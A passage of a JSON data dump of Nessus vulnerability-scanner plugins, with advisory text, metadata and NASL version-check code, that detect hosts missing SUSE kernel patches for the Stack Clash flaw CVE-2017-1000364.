reference:\"kernel-vanilla-debugsource-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-devel-4.4.73-18.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-docs-html / kernel-docs-pdf / kernel-devel / kernel-macros / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:18", "description": "This Linux kernel update for SUSE Linux Enterprise 12 SP1 fixes the following issues :\n\n - A previous security update to address CVE-2017-1000364 caused unintended side-effects in several other tools, most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1704-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1704-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1704-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101080);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1704-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 12 SP1 fixes the\nfollowing issues :\n\n - A previous security update to address CVE-2017-1000364\n caused unintended side-effects in several other tools,\n most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171704-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c1c0aa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1050=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1050=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1050=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-1050=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_48-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_48-default-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_48-xen-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.74-60.64.48.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.74-60.64.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:17", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too small and could be 'jumped over' by userland programs using more than one page of stack in functions and so lead to memory corruption. This update extends the stack guard page to 1 MB (for 4k pages) and 16 MB (for 64k pages) to reduce this attack vector. This is not a kernel bugfix, but a hardening measure against this kind of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-21T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2017:1628-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-1628-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1628-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100954);\n script_version(\"3.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2017:1628-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too\n small and could be 'jumped over' by userland programs\n using more than one page of stack in functions and so\n lead to memory corruption. This update extends the stack\n guard page to 1 MB (for 4k pages) and 16 MB (for 64k\n pages) to reduce this attack vector. This is not a\n kernel bugfix, but a hardening measure against this kind\n of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1018074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1035920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171628-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?86a5c7f1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-kernel-13160=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-kernel-13160=1\n\nSUSE Linux Enterprise Server 11-EXTRA:zypper in -t patch\nslexsp3-kernel-13160=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-kernel-13160=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-source-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-syms-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-104.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-104.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:32", "description": "This update for the Linux Kernel 3.12.67-60_64_18 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1909-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_18-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_18-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1909-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1909-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101887);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1909-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.67-60_64_18 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # 